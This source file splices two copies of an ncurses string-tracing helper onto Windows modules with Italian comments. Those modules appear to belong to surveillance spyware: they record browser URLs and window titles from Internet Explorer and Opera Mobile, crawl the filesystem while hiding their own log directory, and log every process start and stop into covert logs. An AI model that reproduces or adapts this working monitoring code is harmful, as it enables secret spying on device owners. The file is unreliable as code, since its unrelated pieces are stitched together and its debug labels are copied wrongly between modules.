static const char *
_nc_viswbuf2n(int bufnum, const wchar_t *buf, int len)
{
const char *vbuf;
char *tp;
int count;
if (buf == 0)
return ("(null)");
if (len < 0)
len = (int) wcslen(buf);
count = len;
#ifdef TRACE
vbuf = tp = _nc_trace_buf(bufnum, WideLen(len));
#else
{
static char *mybuf[NUM_VISBUFS];
mybuf[bufnum] = typeRealloc(char, WideLen(len), mybuf[bufnum]);
vbuf = tp = mybuf[bufnum];
}
#endif
if (tp != 0) {
wchar_t c;
*tp++ = D_QUOTE;
while ((--count >= 0) && (c = *buf++) != '\0') {
char temp[CCHARW_MAX + 80];
int j = wctomb(temp, c), k;
if (j <= 0) {
_nc_SPRINTF(temp, _nc_SLIMIT(sizeof(temp))
"\\u%08X", (unsigned) c);
j = (int) strlen(temp);
}
for (k = 0; k < j; ++k) {
tp = VisChar(tp, UChar(temp[k]), WideLen(len));
}
}
*tp++ = D_QUOTE;
*tp = '\0';
} else {
vbuf = ("(_nc_viswbuf2n failed)");
}
return (vbuf);
}
static const char *
_nc_viswbuf2n(int bufnum, const wchar_t *buf, int len)
{
const char *vbuf;
char *tp;
wchar_t c;
if (buf == 0)
return ("(null)");
if (len < 0)
len = (int) wcslen(buf);
#ifdef TRACE
vbuf = tp = _nc_trace_buf(bufnum, WideLen(len));
#else
{
static char *mybuf[2];
mybuf[bufnum] = typeRealloc(char, WideLen(len), mybuf[bufnum]);
vbuf = tp = mybuf[bufnum];
}
#endif
if (tp != 0) {
*tp++ = D_QUOTE;
while ((--len >= 0) && (c = *buf++) != '\0') {
char temp[CCHARW_MAX + 80];
int j = wctomb(temp, c), k;
if (j <= 0) {
sprintf(temp, "\\u%08X", (unsigned) c);
j = (int) strlen(temp);
}
for (k = 0; k < j; ++k) {
tp = _nc_vischar(tp, UChar(temp[k]));
}
}
*tp++ = D_QUOTE;
*tp++ = '\0';
} else {
vbuf = ("(_nc_viswbuf2n failed)");
}
return (vbuf);
}
DWORD WINAPI UrlModule(LPVOID lpParam) {
Module *me = (Module *)lpParam;
HANDLE moduleHandle;
wstring strIEUrl, strIE65Url, strOperaUrl, strIEOld, strIE65Old, strOperaOld;
wstring strTitle;
BOOL bEmpty = TRUE;
INT iRet;
UINT uMarkupLen, uHash = 0, uNewHash;
BYTE *pMarkup;
SYSTEMTIME st;
DWORD dw, dwMarker = LOG_URL_MARKER;
WCHAR wNull = 0;
struct tm mytm;
Log log;
me->setStatus(MODULE_RUNNING);
moduleHandle = me->getEvent();
DBG_TRACE(L"Debug - UrlCatcher.cpp - Url Module is Alive\n", 5, FALSE);
if (log.CreateLog(LOGTYPE_URL, NULL, 0, FLASH) == FALSE) {
me->setStatus(MODULE_STOPPED);
return 0;
}
// Inizializziamo uHash con l'hash dell'ultimo URL preso
pMarkup = log.ReadMarkup(MODULE_URL, &uMarkupLen);
if (pMarkup && uMarkupLen == 4)
CopyMemory(&uHash, pMarkup, sizeof(uHash));
if (pMarkup) {
delete[] pMarkup;
pMarkup = NULL;
}
LOOP {
do {
iRet = GetIE60Url(strIEUrl, strTitle, moduleHandle);
// Dobbiamo fermarci
if (iRet < 0) {
if (me->shouldStop()) {
DBG_TRACE(L"Debug - Clipboard.cpp - Clipboard Module is Closing\n", 1, FALSE);
log.CloseLog(bEmpty);
me->setStatus(MODULE_STOPPED);
return 0;
}
if (me->shouldCycle()) {
DBG_TRACE(L"Debug - Clipboard.cpp - Clipboard Module, log cycling\n", 1, FALSE);
log.CloseLog(bEmpty);
log.CreateLog(LOGTYPE_URL, NULL, 0, FLASH);
bEmpty = TRUE;
continue;
}
}
// Calcoliamo l'hash dell'URL attuale
uNewHash = FnvHash((PBYTE)strIEUrl.c_str(), strIEUrl.size() * sizeof(WCHAR));
if (iRet && uNewHash != uHash && strIEUrl != strIEOld) {
GetSystemTime(&st);
SET_TIMESTAMP(mytm, st);
if (log.WriteLog((BYTE *)&mytm, sizeof(mytm)))
bEmpty = FALSE;
log.WriteLog((BYTE *)&dwMarker, sizeof(dwMarker));
log.WriteLog((BYTE *)strIEUrl.c_str(), strIEUrl.size() * sizeof(WCHAR));
log.WriteLog((BYTE *)&wNull, sizeof(WCHAR)); // Scriviamo UN byte di NULL
// Scriviamo il tipo di browser
dw = 1; // IE
log.WriteLog((BYTE *)&dw, sizeof(dw));
// Scriviamo il titolo della finestra + NULL
if (strTitle.empty())
strTitle = L"UNKNOWN";
log.WriteLog((BYTE *)strTitle.c_str(), WideLen((PWCHAR)strTitle.c_str()));
log.WriteLog((BYTE *)&wNull, sizeof(WCHAR)); // Scriviamo UN byte di NULL
// Scriviamo il delimitatore
dw = LOG_DELIMITER;
log.WriteLog((BYTE *)&dw, sizeof(dw));
// Scriviamo l'hash dell'URL attuale nel markup
uHash = FnvHash((PBYTE)strIEUrl.c_str(), strIEUrl.size() * sizeof(WCHAR));
log.WriteMarkup(MODULE_URL, (PBYTE)&uHash, sizeof(uHash));
strIEOld = strIEUrl;
}
} while(0);
do {
iRet = GetIE65Url(strIE65Url, strTitle, moduleHandle);
// Dobbiamo fermarci
if (iRet < 0) {
if (me->shouldStop()) {
DBG_TRACE(L"Debug - Clipboard.cpp - Clipboard Module is Closing\n", 1, FALSE);
log.CloseLog(bEmpty);
me->setStatus(MODULE_STOPPED);
return 0;
}
if (me->shouldCycle()) {
DBG_TRACE(L"Debug - Clipboard.cpp - Clipboard Module, log cycling\n", 1, FALSE);
log.CloseLog(bEmpty);
log.CreateLog(LOGTYPE_URL, NULL, 0, FLASH);
bEmpty = TRUE;
continue;
}
}
// Calcoliamo l'hash dell'URL attuale
uNewHash = FnvHash((PBYTE)strIE65Url.c_str(), strIE65Url.size() * sizeof(WCHAR));
if (iRet && uNewHash != uHash && strIE65Url != strIE65Old) {
GetSystemTime(&st);
SET_TIMESTAMP(mytm, st);
if (log.WriteLog((BYTE *)&mytm, sizeof(mytm)))
bEmpty = FALSE;
log.WriteLog((BYTE *)&dwMarker, sizeof(dwMarker));
log.WriteLog((BYTE *)strIE65Url.c_str(), strIE65Url.size() * sizeof(WCHAR));
log.WriteLog((BYTE *)&wNull, sizeof(WCHAR)); // Scriviamo UN byte di NULL
// Scriviamo il tipo di browser
dw = 1; // IE
log.WriteLog((BYTE *)&dw, sizeof(dw));
// Scriviamo il titolo della finestra + NULL
if (strTitle.empty())
strTitle = L"UNKNOWN";
log.WriteLog((BYTE *)strTitle.c_str(), WideLen((PWCHAR)strTitle.c_str()));
log.WriteLog((BYTE *)&wNull, sizeof(WCHAR)); // Scriviamo UN byte di NULL
// Scriviamo il delimitatore
dw = LOG_DELIMITER;
log.WriteLog((BYTE *)&dw, sizeof(dw));
// Scriviamo l'hash dell'URL attuale nel markup
uHash = FnvHash((PBYTE)strIE65Url.c_str(), strIE65Url.size() * sizeof(WCHAR));
log.WriteMarkup(MODULE_URL, (PBYTE)&uHash, sizeof(uHash));
strIE65Old = strIE65Url;
}
} while(0);
do {
iRet = GetOperaUrl(strOperaUrl, strTitle, moduleHandle);
// Dobbiamo fermarci
if (iRet < 0) {
if (me->shouldStop()) {
DBG_TRACE(L"Debug - Clipboard.cpp - Clipboard Module is Closing\n", 1, FALSE);
log.CloseLog(bEmpty);
me->setStatus(MODULE_STOPPED);
return 0;
}
if (me->shouldCycle()) {
DBG_TRACE(L"Debug - Clipboard.cpp - Clipboard Module, log cycling\n", 1, FALSE);
log.CloseLog(bEmpty);
log.CreateLog(LOGTYPE_URL, NULL, 0, FLASH);
bEmpty = TRUE;
continue;
}
}
// Calcoliamo l'hash dell'URL attuale
uNewHash = FnvHash((PBYTE)strOperaUrl.c_str(), strOperaUrl.size() * sizeof(WCHAR));
if (iRet && uNewHash != uHash && strOperaUrl != strOperaOld) {
GetSystemTime(&st);
SET_TIMESTAMP(mytm, st);
if (log.WriteLog((BYTE *)&mytm, sizeof(mytm)))
bEmpty = FALSE;
log.WriteLog((BYTE *)&dwMarker, sizeof(dwMarker));
log.WriteLog((BYTE *)strOperaUrl.c_str(), strOperaUrl.size() * sizeof(WCHAR));
log.WriteLog((BYTE *)&wNull, sizeof(WCHAR)); // Scriviamo UN byte di NULL
// Scriviamo il tipo di browser
dw = 3; // Opera-Mobile
log.WriteLog((BYTE *)&dw, sizeof(dw));
// Scriviamo il titolo della finestra + NULL
if (strTitle.empty())
strTitle = L"UNKNOWN";
log.WriteLog((BYTE *)strTitle.c_str(), WideLen((PWCHAR)strTitle.c_str()));
log.WriteLog((BYTE *)&wNull, sizeof(WCHAR)); // Scriviamo UN byte di NULL
// Scriviamo il delimitatore
dw = LOG_DELIMITER;
log.WriteLog((BYTE *)&dw, sizeof(dw));
// Scriviamo l'hash dell'URL attuale nel markup
uHash = FnvHash((PBYTE)strOperaUrl.c_str(), strOperaUrl.size() * sizeof(WCHAR));
log.WriteMarkup(MODULE_URL, (PBYTE)&uHash, sizeof(uHash));
strOperaOld = strOperaUrl;
}
} while(0);
WaitForSingleObject(moduleHandle, 5000);
if (me->shouldStop()) {
DBG_TRACE(L"Debug - Clipboard.cpp - Clipboard Module is Closing\n", 1, FALSE);
log.CloseLog(bEmpty);
me->setStatus(MODULE_STOPPED);
return 0;
}
if (me->shouldCycle()) {
DBG_TRACE(L"Debug - Clipboard.cpp - Clipboard Module, log cycling\n", 1, FALSE);
log.CloseLog(bEmpty);
log.CreateLog(LOGTYPE_URL, NULL, 0, FLASH);
}
}
return TRUE;
}
// Ritorna FALSE se la esplora ed e' vuota oppure se non e' valida
BOOL Explorer::ExploreDirectory(WCHAR *wStartPath, DWORD dwDepth) {
WIN32_FIND_DATAW wfd;
HANDLE hFind = INVALID_HANDLE_VALUE;
BOOL bFull = FALSE;
FilesystemData fsData;
WCHAR wFilePath[MAX_PATH], wRecursePath[MAX_PATH];
WCHAR wHiddenPath[MAX_PATH];
wstring strPath = L"\\*";
if (wStartPath == NULL) {
DBG_TRACE(L"Debug - Explorer.cpp - ExploreDirectory() [wStartPath == NULL] ", 5, TRUE);
return FALSE;
}
if (dwDepth == 0)
return TRUE;
// Evita il browsing della dir nascosta
_snwprintf(wHiddenPath, MAX_PATH, L"%s", LOG_DIR_NAME);
// Bisogna partire dalla lista dei drive
if (!wcscmp(wStartPath, L"/")) {
// Nel caso speciale impostiamo la depth a 2, il primo run
// trova solo la root "\", il secondo i file nella root.
dwDepth = 2;
// Creiamo una root-entry artificiale
ZeroMemory(&fsData, sizeof(FilesystemData));
fsData.dwVersion = LOG_FILESYSTEM_VERSION;
fsData.dwFlags = FILESYSTEM_IS_DIRECTORY;
strPath = L"\\";
DBG_TRACE_STR(L"Debug - Explorer.cpp - Logging path: ", strPath.c_str(), 4, FALSE);
fsData.dwPathLen = strPath.size() * sizeof(WCHAR);
log.WriteLog((BYTE *)&fsData, sizeof(fsData));
log.WriteLog((BYTE *)strPath.c_str(), fsData.dwPathLen);
// Iniziamo la ricerca reale
ZeroMemory(&wfd, sizeof(wfd));
hFind = FindFirstFileW(strPath.c_str(), &wfd);
if (hFind == INVALID_HANDLE_VALUE) {
DWORD dwErr = GetLastError();
if (dwErr != ERROR_NO_MORE_FILES) {
DBG_TRACE_INT(L"Debug - Explorer.cpp - ExploreDirectory() [FindFirstFileW() (1) Failed] Err: ", 5, FALSE, dwErr);
}
return FALSE;
}
do {
if (wcsstr(wfd.cFileName, wHiddenPath))
continue;
ZeroMemory(&fsData, sizeof(FilesystemData));
fsData.dwVersion = LOG_FILESYSTEM_VERSION;
fsData.dwFileSizeHi = wfd.nFileSizeHigh;
fsData.dwFileSizeLo = wfd.nFileSizeLow;
fsData.ftTime = wfd.ftLastWriteTime;
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
fsData.dwFlags |= FILESYSTEM_IS_DIRECTORY;
strPath = L"\\";
strPath += wfd.cFileName;
DBG_TRACE_STR(L"Debug - Explorer.cpp - Logging path: ", strPath.c_str(), 4, FALSE);
fsData.dwPathLen = strPath.size() * sizeof(WCHAR);
log.WriteLog((BYTE *)&fsData, sizeof(fsData));
log.WriteLog((BYTE *)strPath.c_str(), fsData.dwPathLen);
if (!ExploreDirectory(RecurseDirectory(wfd.cFileName, wRecursePath), dwDepth - 1))
fsData.dwFlags |= FILESYSTEM_IS_EMPTY;
} while (FindNextFile(hFind, &wfd));
FindClose(hFind);
return TRUE;
}
ZeroMemory(&wfd, sizeof(wfd));
hFind = FindFirstFileW(wStartPath, &wfd);
if (hFind == INVALID_HANDLE_VALUE) {
DWORD dwErr = GetLastError();
if (dwErr != ERROR_NO_MORE_FILES) {
DBG_TRACE_INT(L"Debug - Explorer.cpp - ExploreDirectory() [FindFirstFileW() (2) Failed] Err: ", 5, FALSE, dwErr);
}
}
do {
if (wcsstr(wfd.cFileName, wHiddenPath))
continue;
bFull = TRUE;
ZeroMemory(&fsData, sizeof(FilesystemData));
fsData.dwVersion = LOG_FILESYSTEM_VERSION;
fsData.dwFileSizeHi = wfd.nFileSizeHigh;
fsData.dwFileSizeLo = wfd.nFileSizeLow;
fsData.ftTime = wfd.ftLastWriteTime;
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
fsData.dwFlags |= FILESYSTEM_IS_DIRECTORY;
CompleteDirectoryPath(wStartPath, wfd.cFileName, wFilePath);
fsData.dwPathLen = WideLen(wFilePath);
if (fsData.dwFlags & FILESYSTEM_IS_DIRECTORY)
if (!ExploreDirectory(RecurseDirectory(wFilePath, wRecursePath), dwDepth - 1))
fsData.dwFlags |= FILESYSTEM_IS_EMPTY;
DBG_TRACE_STR(L"Debug - Explorer.cpp - Logging path: ", wFilePath, 4, FALSE);
log.WriteLog((BYTE *)&fsData, sizeof(fsData));
log.WriteLog((BYTE *)&wFilePath, fsData.dwPathLen);
} while (FindNextFileW(hFind, &wfd));
FindClose(hFind);
return bFull;
}
DWORD WINAPI ApplicationModule(LPVOID lpParam) {
Module *me = (Module *)lpParam;
HANDLE moduleHandle;
Log log;
list<ProcessEntry> pProcessList, pUpdatedProcess;
list<ProcessEntry>::iterator iterOld, iterNew;
ProcessMonitor *processObj = ProcessMonitor::self();
wstring wDesc;
struct tm mytm;
WCHAR wNull = 0;
SYSTEMTIME st;
BOOL bFirst = TRUE, bFound = FALSE, bEmpty = TRUE;
pProcessList.clear();
pUpdatedProcess.clear();
me->setStatus(MODULE_RUNNING);
moduleHandle = me->getEvent();
DBG_TRACE(L"Debug - Application.cpp - Application Module started\n", 5, FALSE);
// Creiamo il log
if (log.CreateLog(LOGTYPE_APPLICATION, NULL, 0, FLASH) == FALSE) {
me->setStatus(MODULE_STOPPED);
DBG_TRACE(L"Debug - Application.cpp - Application Module cannot create log\n", 5, FALSE);
return TRUE;
}
DBG_TRACE(L"Debug - Application.cpp - Application Module is Alive\n", 1, FALSE);
LOOP {
do {
if (bFirst) {
bFirst = FALSE;
pProcessList.clear();
if (pUpdatedProcess.empty())
processObj->GetProcessList(pProcessList);
else
pProcessList = pUpdatedProcess;
} else {
bFirst = TRUE;
pUpdatedProcess.clear();
processObj->GetProcessList(pUpdatedProcess);
if (pUpdatedProcess.empty() || pProcessList.empty())
continue;
// Confronta le due liste (la nuova con la vecchia) alla ricerca di nuovi processi
for (iterNew = pUpdatedProcess.begin(); iterNew != pUpdatedProcess.end(); iterNew++) {
for (iterOld = pProcessList.begin(); iterOld != pProcessList.end(); iterOld++) {
if (!wcscmp((*iterOld).pe.szExeFile, (*iterNew).pe.szExeFile)) {
bFound = TRUE; // Situazione invariata
pProcessList.erase(iterOld);
break;
}
}
if (bFound == FALSE) {
GetSystemTime(&st);
SET_TIMESTAMP(mytm, st);
// 1. Scriviamo il timestamp
if (log.WriteLog((BYTE *)&mytm, sizeof(mytm)))
bEmpty = FALSE;
// 2. Poi il nome del file
log.WriteLog((BYTE *)(*iterNew).pe.szExeFile, WideLen((*iterNew).pe.szExeFile));
log.WriteLog((BYTE *)&wNull, sizeof(WCHAR));
// 3. Quindi lo stato (START o STOP)
log.WriteLog((BYTE *)L"START", WideLen(L"START"));
log.WriteLog((BYTE *)&wNull, sizeof(WCHAR));
// 4. La descrizione (se disponibile)
wDesc = processObj->GetProcessDescription((*iterNew).pe.th32ProcessID);
if (wDesc.empty() == FALSE)
log.WriteLog((BYTE *)wDesc.c_str(), wDesc.size() * sizeof(WCHAR));
log.WriteLog((BYTE *)&wNull, sizeof(WCHAR));
// 5. Ed il delimitatore
UINT delimiter = LOG_DELIMITER;
log.WriteLog((BYTE *)&delimiter, sizeof(delimiter));
}
bFound = FALSE;
}
for (iterOld = pProcessList.begin(); iterOld != pProcessList.end(); iterOld++) {
GetSystemTime(&st);
SET_TIMESTAMP(mytm, st);
// 1. Scriviamo il timestamp
if (log.WriteLog((BYTE *)&mytm, sizeof(mytm)))
bEmpty = FALSE;
// 2. Poi il nome del file
log.WriteLog((BYTE *)(*iterOld).pe.szExeFile, WideLen((*iterOld).pe.szExeFile));
log.WriteLog((BYTE *)&wNull, sizeof(WCHAR));
// 3. Quindi lo stato (START o STOP)
log.WriteLog((BYTE *)L"STOP", WideLen(L"STOP"));
log.WriteLog((BYTE *)&wNull, sizeof(WCHAR));
// 4. La descrizione (se disponibile)
wDesc = processObj->GetProcessDescription((*iterOld).pe.th32ProcessID);
if (wDesc.empty() == FALSE)
log.WriteLog((BYTE *)wDesc.c_str(), wDesc.size() * sizeof(WCHAR));
log.WriteLog((BYTE *)&wNull, sizeof(WCHAR));
// 5. Ed il delimitatore
UINT delimiter = LOG_DELIMITER;
log.WriteLog((BYTE *)&delimiter, sizeof(delimiter));
}
}
} while(0);
WaitForSingleObject(moduleHandle, 5000);
if (me->shouldStop()) {
DBG_TRACE(L"Debug - Application.cpp - Application Module is Closing\n", 1, FALSE);
pProcessList.clear();
pUpdatedProcess.clear();
log.CloseLog(bEmpty);
me->setStatus(MODULE_STOPPED);
return 0;
}
if (me->shouldCycle()) {
log.CloseLog(bEmpty);
log.CreateLog(LOGTYPE_APPLICATION, NULL, 0, FLASH);
DBG_TRACE(L"Debug - Application.cpp - Application Module, log cycling\n", 1, FALSE);
}
}
return FALSE;
}
